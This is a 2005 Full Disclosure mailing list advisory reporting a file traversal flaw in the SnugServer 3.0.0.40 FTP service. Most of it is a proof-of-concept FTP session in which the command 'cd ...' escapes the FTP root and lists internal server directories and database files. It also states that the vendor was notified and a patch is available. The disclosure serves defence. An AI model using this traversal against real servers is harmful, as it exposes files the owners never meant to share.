Full Disclosure mailing list archives
Remotely exploitable file traversal vulnerability in SnugServer 3.0.0.40 FTP Service
From: <muts () zahav net il>
Date: Thu, 27 Jan 2005 17:37:41 +0200
See Security, Research and Development www.see-security.com ------------------------------------------------------ [-] Product Information SnugServer - All your Software Servers in 1 Application. Upload and download files to/from the Internet. Unique firewall file system where your FTP files can be stored in a data file to prevent internal network hacker attacks. Product Homepage: http://www.snugserver.com/ [-] Vulnerability Description A file traversal vulnerability has been discovered in SnugServer 3.0.0.40 FTP Service, which allows access to the server filesystem, outside of ftproot. [-]PoC root@Whoppix:/# ftp 192.168.1.154 Connected to 192.168.1.154. 220- Welcome FTP User. SnugServer is ready. Name (192.168.1.154:root): muts () default com 331 Password required for muts () default com. Password: 230 See FTP Server Remote system type is You. ftp> ls 200 PORT Command Successful. 150 Opening ASCII mode data connection for directory listing. drw-rw-rw- 1 owner group 0 Jan 21 03:51 .. drw-rw-rw- 1 owner group 0 Jan 21 02:08 dir 226 Transfer Complete. ftp> cd ... 200 PORT Command Successful. ftp> ls 200 PORT Command Successful. 150 Opening ASCII mode data connection for directory listing. drw-rw-rw- 1 owner group 0 Jan 21 03:51 .. drw-rw-rw- 1 owner group 0 Jan 21 03:51 Cert drw-rw-rw- 1 owner group 0 Jan 21 03:51 Logs drw-rw-rw- 1 owner group 0 Jan 21 03:51 Requests drw-rw-rw- 1 owner group 0 Jan 21 03:51 Scripts drw-rw-rw- 1 owner group 0 Jan 21 03:51 Errors drw-rw-rw- 1 owner group 0 Jan 21 03:51 Queue drw-rw-rw- 1 owner group 0 Jan 21 03:51 www drw-rw-rw- 1 owner group 0 Jan 21 03:51 Infected drw-rw-rw- 1 owner group 0 Jan 21 03:51 Temp drw-rw-rw- 1 owner group 0 Jan 21 03:51 Filtered drw-rw-rw- 1 owner group 0 Jan 21 03:51 BaseData -rw-rw-rw- 1 owner group 8421376 Jan 21 03:52 SNUG.FDB drw-rw-rw- 1 owner group 0 Jan 21 03:51 ftp -rw-rw-rw- 1 owner group 1861120 Jan 21 03:52 Snug.gbk -rw-rw-rw- 1 owner group 32 Jan 21 03:52 yarrow.rnd 226 Transfer Complete. ftp> [-] Patch The vendor has been notified, and an update is available at: http://www.snugserver.com/download.php [-] Credits This vulnerability was discovered by muts _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Current thread:
- Remotely exploitable file traversal vulnerability in SnugServer 3.0.0.40 FTP Service muts (Jan 27)